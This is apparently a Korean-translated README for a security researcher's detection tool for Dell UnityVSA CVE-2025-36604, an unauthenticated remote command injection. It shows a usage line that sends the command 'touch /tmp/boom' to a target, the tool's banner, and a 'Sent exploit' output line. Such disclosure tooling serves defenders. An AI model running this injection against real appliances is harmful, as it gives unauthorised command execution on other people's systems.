
Dell UnityVSA CVE-2025-36604용 탐지 아티팩트 생성기
Dell UnityVSA CVE-2025-36604 탐지 아티팩트 생성기
https://github.com/user-attachments/assets/28488a97-7845-4b78-9fe7-64b9172ab023
기술적 세부 사항은 블로그 게시물을 참조하세요.
python watchTowr-vs-Dell-UnityVSA-PreAuth-CVE-2025-36604.py --target https://192.168.5.45/ --command "touch /tmp/boom"
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( <_> \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
watchTowr-vs-Dell-UnityVSA-CVE-2025-36604.py
(*) Dell UnityVSA Unauthenticated Remote Command Injection Detection Artifact Generator
- Sina Kheirkhah (@SinSinology) of watchTowr (@watchTowrcyber)
CVEs: [CVE-2025-36604]
[+] Sent exploit to https://192.168.5.45
이 스크립트는 Dell UnityVSA가 CVE-2025-36604에 취약한지 여부를 탐지하려고 시도합니다.
5.5.1 이전 버전 이 문제의 영향을 받습니다.
자세한 내용은 Dell UnityVSA 보안 업데이트 노트를 참조하세요.
최신 보안 연구를 보려면 watchTowr Labs 팀을 팔로우하세요.